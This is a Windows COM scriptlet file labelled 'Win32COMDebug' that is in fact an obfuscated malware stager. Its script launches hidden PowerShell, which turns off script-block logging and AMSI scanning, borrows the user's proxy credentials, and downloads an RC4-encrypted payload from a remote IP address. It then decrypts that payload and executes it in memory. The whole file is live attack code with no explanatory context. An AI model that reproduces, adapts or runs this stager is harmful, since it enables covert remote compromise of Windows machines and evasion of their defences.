<?XML version="1.0"?>
<scriptlet>
<registration
description="Win32COMDebug"
progid="Win32COMDebug"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
 >
 <script language="JScript">
      <![CDATA[
           var r = new ActiveXObject("WScript.Shell").Run('c:\WINdOWs\SYstEM32\CMD   /C"set  XpcM=   Set-ITem  ("v"+"aRIa"+"b"+"l"+"E:7QUiav")  ( [TYpE]("{3}{7}{6}{5}{9}{8}{0}{4}{2}{1}" -f \'Y[S\',\'.ObjeCt\',\'inG,syStEM\',\'COL\',\'tr\',\'IC.dICt\',\'oNs.gener\',\'leCtI\',\'NaR\',\'iO\')  ) ;  sV (\'6\'+\'daX94\') ( [tYPE]("{0}{2}{1}{3}" -F\'sC\',\'IPtB\',\'r\',\'LocK\') ) ;sV G2Qu64 (  [TyPe]("{1}{0}" -F\'eF\',\'R\')); SEt (\'3\'+\'12\') ( [TypE]("{0}{2}{1}{3}{5}{4}"-f\'sYST\',\'M.nEt.SErvi\',\'e\',\'cepoINTma\',\'aGer\',\'N\')  )  ;   SEt-Item variaBle:EwH (  [TYpE]("{2}{3}{4}{0}{1}"-f\'EM.nEt.wEBREQU\',\'eST\',\'s\',\'ys\',\'t\'));   set-iTeM  vARIAble:tasKp1  ( [tYpe]("{5}{4}{2}{6}{3}{1}{0}" -F \'CAcHe\',\'L\',\'creDeN\',\'A\',\'nET.\',\'sYSTEm.\',\'TI\')  );    $jXs =[tYpe]("{2}{3}{0}{4}{5}{1}"-f \'exT.en\',\'G\',\'sYsTe\',\'m.T\',\'CO\',\'DiN\')  ;  If(${pSVE`Rsion`TABLE}."P`sVER`siON"."maj`Or" -ge 3){${G`pf}= (  VARiAble ("g"+"2Qu6"+"4")  ).VALuE."as`seMblY".("{1}{0}{2}"-f\'P\',\'GetTy\',\'E\').Invoke(("{2}{5}{6}{0}{3}{4}{1}"-f\'Management.Au\',\'s\',\'S\',\'tom\',\'ation.Util\',\'yste\',\'m.\'))."GEtFIe`Ld"(("{1}{0}{5}{7}{2}{4}{6}{3}" -f \'c\',\'ca\',\'u\',\'ings\',\'pPolic\',\'hedGr\',\'ySett\',\'o\'),\'N\'+("{0}{1}{2}{3}" -f \'o\',\'nPublic,Stat\',\'i\',\'c\'));IF(${g`pf}){${G`Pc}=${G`Pf}.("{0}{1}" -f\'GetVa\',\'luE\').Invoke(${Nu`Ll});IF(${g`Pc}[("{0}{1}{2}" -f\'Sc\',\'rip\',\'tB\')+("{2}{0}{3}{1}"-f \'Log\',\'ing\',\'lock\',\'g\')]){${G`PC}[("{0}{1}"-f\'Script\',\'B\')+("{2}{3}{1}{0}" -f \'ging\',\'ckLog\',\'l\',\'o\')][("{2}{0}{1}" -f \'bleSc\',\'riptB\',\'Ena\')+("{1}{2}{0}"-f \'ging\',\'lockL\',\'og\')]=0;${g`pc}[("{0}{1}" -f\'S\',\'criptB\')+("{2}{1}{0}{3}" -f\'i\',\'gg\',\'lockLo\',\'ng\')][("{2}{6}{5}{3}{4}{8}{7}{1}{0}" -f \'ing\',\'ogg\',\'E\',\'In\',\'voc\',\'leScriptBlock\',\'nab\',\'tionL\',\'a\')]=0}${v`Al}= (  VARIaBLe  ("7qU"+"ia"+"V") -VAlUe  )::("{1}{0}"-f \'w\',\'nE\').Invoke();${v`AL}.("{1}{0}"-f \'D\',\'Ad\').Invoke(("{3}{1}{2}{0}"-f \'ScriptB\',\'abl\',\'e\',\'En\')+("{0}{1}{2}"-f\'l\',\'ockLog\',\'ging\'),0);${V`AL}.("{0}{1}" -f\'A\',\'DD\').Invoke(("{0}{5}{3}{2}{4}{8}{6}{7}{1}"-f\'Enable\',\'Logging\',\'tBlock\',\'ip\',\'Inv\',\'Scr\',\'o\',\'n\',\'ocati\'),0);${G`pC}[((("{0}{12}{4}{9}{1}{6}{13}{3}{8}{2}{15}{14}{5}{7}{10}{11}" -f\'HKE\',\'CHINE{0}S\',\'ies{0}Micr\',\'{0}Pol\',\'OCAL\',\'s{0}\',\'oftwa\',\'Powe\',\'ic\',\'_MA\',\'rShel\',\'l{0}ScriptB\',\'Y_L\',\'re\',\'dow\',\'osoft{0}Win\'))  -f [ChAR]92)+("{2}{1}{3}{0}"-f \'ing\',\'k\',\'loc\',\'Logg\')]=${v`AL}}ELSE{  $6dAx94."GeTFiE`ld"(("{3}{1}{0}{2}" -f \'natu\',\'g\',\'res\',\'si\'),\'N\'+("{3}{4}{0}{1}{2}" -f\',S\',\'t\',\'atic\',\'onP\',\'ublic\'))."setV`Alue"(${n`Ull},(.("{1}{0}{3}{2}" -f \'W\',\'NE\',\'t\',\'-ObjEC\') ("{1}{4}{2}{0}{7}{6}{5}{3}" -f \'H\',\'COlL\',\'ns.GEneRIC.\',\'ing]\',\'EcTIo\',\'T[sTR\',\'hSe\',\'AS\')))} (Get-ChilditEm  variabLe:G2qU64).vAlUe."a`sSE`mBly".("{1}{0}{2}"-f \'tT\',\'GE\',\'ypE\').Invoke(("{1}{6}{5}{2}{3}{0}{4}" -f \'tion.AmsiU\',\'Sy\',\'.Au\',\'toma\',\'tils\',\'ment\',\'stem.Manage\'))^|^&(\'?\'){${_}}^|^&(\'%\'){${_}.("{1}{0}" -f\'d\',\'GetFieL\').Invoke(("{3}{2}{4}{0}{1}"-f\'le\',\'d\',\'Fa\',\'amsiInit\',\'i\'),("{1}{4}{3}{0}{2}" -f \'c,S\',\'NonP\',\'tatic\',\'i\',\'ubl\')).("{0}{2}{1}"-f \'Se\',\'luE\',\'tVa\').Invoke(${Nu`ll},${T`RuE})};};  $312::"e`xp`ec`T100`CoNTinue"=0;${wC}=.("{1}{0}{2}"-f \'W-ObJEc\',\'NE\',\'t\') ("{4}{6}{1}{2}{0}{3}{5}" -f \'eb\',\'NET\',\'.W\',\'CLIE\',\'SyStem\',\'Nt\',\'.\');${U}=("{6}{9}{7}{2}{8}{4}{3}{1}{10}{0}{5}{11}" -f\'W\',\'; W\',\'nd\',\'.1\',\'s NT 6\',\'64; Trident/7.0; rv:\',\'Mozil\',\'(Wi\',\'ow\',\'la/5.0 \',\'O\',\'11.0) like Gecko\');${W`c}."hEaD`ers".("{0}{1}" -f\'A\',\'DD\').Invoke(("{1}{2}{0}" -f \'nt\',\'U\',\'ser-Age\'),${U});${wC}."pR`OXY"=  ( ITem  VARiAbLE:eWH  ).VAluE::"De`FA`UL`TWeB`PROxy";${Wc}."prO`Xy"."cR`eDeN`TiA`lS" =   $TaSkp1::"DEFaulTne`T`worKcrEDEN`T`Ials";${s`cRIPt:`PRo`XY} = ${wC}."PR`OXy";${k}=  $jxs::"a`sCii".("{0}{1}" -f\'GeTB\',\'YtEs\').Invoke(\'%NOgcsw(,4_YAx^<lS?GUvLF{3Zd!iy5q\');${r}={${d},${k}=${AR`gs};${S}=0..255;0..255^|.(\'%\'){${J}=(${j}+${s}[${_}]+${k}[${_}%${k}."Co`UNT"])%256;${s}[${_}],${S}[${J}]=${S}[${j}],${s}[${_}]};${D}^|.(\'%\'){${I}=(${I}+1)%256;${h}=(${h}+${S}[${i}])%256;${S}[${i}],${S}[${H}]=${S}[${H}],${s}[${I}];${_}-bxor${s}[(${s}[${I}]+${s}[${h}])%256]}};${S`Er}=("{0}{1}{4}{3}{6}{2}{5}" -f\'http\',\':\',\'68.55.21:\',\'92.\',\'//1\',\'80\',\'1\');${T}=("{3}{1}{0}{2}"-f\'dmin\',\'a\',\'/get.php\',\'/\');${wc}."Hea`d`eRs".("{0}{1}"-f \'AD\',\'D\').Invoke(("{0}{1}"-f\'Co\',\'okie\'),("{4}{5}{2}{0}{1}{3}"-f\'qgxqrtuN4\',\'m\',\'ZKZNS21s\',\'1fQZiCs=\',\'se\',\'ssion=iG\'));${d`AtA}=${w`C}.("{2}{0}{1}{3}"-f \'o\',\'WnLoAdD\',\'D\',\'aTA\').Invoke(${S`eR}+${t});${Iv}=${d`AtA}[0..3];${d`ATa}=${Da`TA}[4..${dA`Ta}."l`ENG`Th"];-joIn[CHaR[]](^& ${R} ${dA`TA} (${I`V}+${K}))^|^&("{1}{0}" -f \'EX\',\'I\') &&sET   glBM=EcHO ${eXeCUtioncONtexT}.iNVOkeCoMMaND.iNvOkESCriPT( ([enVIRonMEnT]::GETENViRonmeNTVARiAbLE(\'XPCM\',\'PrOcEsS\')) )^| PoWeRshELL  -NOninTeRaC -WIn hI -NOE  -NoProfil  -ExeCUTIONPO Bypass    -  && c:\WINdOWs\SYstEM32\CMD   /C%gLBm%"');
      ]]>
 </script>
</registration>
<public>
    <method name="Exec"></method>
</public>
</scriptlet>
